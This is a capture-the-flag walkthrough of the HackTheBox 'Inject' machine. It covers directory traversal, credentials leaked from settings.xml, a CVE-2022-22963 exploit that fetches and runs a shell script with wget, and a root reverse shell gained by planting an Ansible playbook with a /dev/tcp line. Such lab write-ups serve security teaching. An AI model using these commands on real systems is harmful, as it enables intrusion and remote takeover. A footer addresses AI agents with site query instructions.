# HackTheBox "Inject"
Info Card

Info Card

## Introduction [Inject](https://www.hackthebox.com/machines/inject) is an easy box released on March 11th, 2023 by rajHere. ## User Own Nmap: ``` Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-17 12:14 EDT Nmap scan report for 10.10.11.204 Host is up (0.031s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA) | 256 d51c81c97b076b1cc1b429254b52219f (ECDSA) |_ 256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519) 8080/tcp open nagios-nsca Nagios NSCA |_http-title: Home Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds ``` There is a website at `10.10.11.204:8080`. The file upload only accepts images, so nothing much there. However, `GET /show_image?img=` is vulnerable to directory traversal. ``` ../../../../../../etc/passwd ```
Burp Suite Repeater

Burp Suite Repeater

`/etc/passwd` shows there are two users named `frank` and `phil`. `phil`'s home directory contains the `user.txt` flag. `frank`'s home directory contains an abnormal directory called `.m2`. `.m2` contains `settings.xml` which has credentials. {% code title="settings.xml" %} ``` Inject phil DocPhillovestoInject123 ${user.home}/.ssh/id_dsa 660 660 ``` {% endcode %} While we have credentials, the credentials don't work for logging into `phil` through SSH. Checking `/var/www/WebApp/pom.xml`, the web app is using Spring Cloud 3.2.2, which is vulnerable to CVE-2022-22963. This [Python script](https://github.com/lemmyz4n3771/CVE-2022-22963-PoC) can get us a reverse shell as `frank`. {% code title="Terminal 1" %} ``` python3 -m http.server 80 ``` {% endcode %} {% code title="Terminal 2" %} ``` python3 exploit.py 10.10.11.204:8080 'wget http://10.10.xx.xx/Documents/rev_shell.sh -O /tmp/rev_shell.sh' [+] Host is vulnerable [+] Command executed [+] Exploit completed python3 exploit.py 10.10.11.204:8080 'chmod +x /tmp/rev_shell.sh' [+] Host is vulnerable [+] Command executed [+] Exploit completed python3 exploit.py 10.10.11.204:8080 '/tmp/rev_shell.sh' [+] Host is vulnerable [+] Command executed [+] Exploit completed ``` {% endcode %} {% code title="Terminal 3" %} ``` nc -nvlp 1234 listening on [any] 1234 ... connect to [10.10.xx.xx] from (UNKNOWN) [10.10.11.204] 45152 whoami frank ``` {% endcode %} While the password for `phil` won't work for SSH, we can still login to `phil` from `frank` using `su phil` and the password from `settings.xml`. ``` su phil Password: DocPhillovestoInject123 whoami phil cd ~ cat user.txt [USER FLAG HERE] ```
USER OWN

USER OWN

## System Own Inside `/opt` is file called `automation/tasks/playbook_1.yml`. {% code title="playbook\_1.yml" %} ``` - hosts: localhost tasks: - name: Checking webapp service ansible.builtin.systemd: name: webapp enabled: yes state: started ``` {% endcode %} We can find an interesting line from `pspy`: ``` CMD: UID=0 PID=15628 | /bin/sh -c /usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml ``` Every `.yml` file inside of `/opt/automation/tasks` is being run by `ansible-parallel` every 2 minutes. `/opt/automation/tasks` is only writable by a group called `staff`. ``` grep staff /etc/group staff:x:50:phil ``` `phil` is in `staff`, so we can put any `.yml` file we want in `/opt/automation/tasks` as `phil`. We can use a custom playbook that gives us a reverse shell as `root`. According to the [Ansible docs](https://docs.ansible.com/ansible/latest/collections/ansible/builtin/shell_module.html), we can run shell code with a playbook. This [Gist code](https://gist.github.com/Reelix/32ccf1baaa3066654a460265fca53960) will work. {% code title="playbook\_custom.yml" %} ``` - hosts: localhost tasks: - name: rev shell: bash -c 'bash -i >& /dev/tcp/10.10.xx.xx/1234 0>&1' ``` {% endcode %} Once the system runs our playbook, we get a reverse shell as `root`, letting us read the `root.txt` flag. ``` nc -nvlp 1234 listening on [any] 1234 ... connect to [10.10.xx.xx] from (UNKNOWN) [10.10.11.204] 56648 bash: cannot set terminal process group (17831): Inappropriate ioctl for device bash: no job control in this shell root@inject:/opt/automation/tasks# cat /root/root.txt cat /root/root.txt [ROOT FLAG HERE] ```
SYSTEM OWN

SYSTEM OWN

And that's the box!
PWNED

PWNED

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gitbook.bennettcl.app/write-ups/hackthebox-inject.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.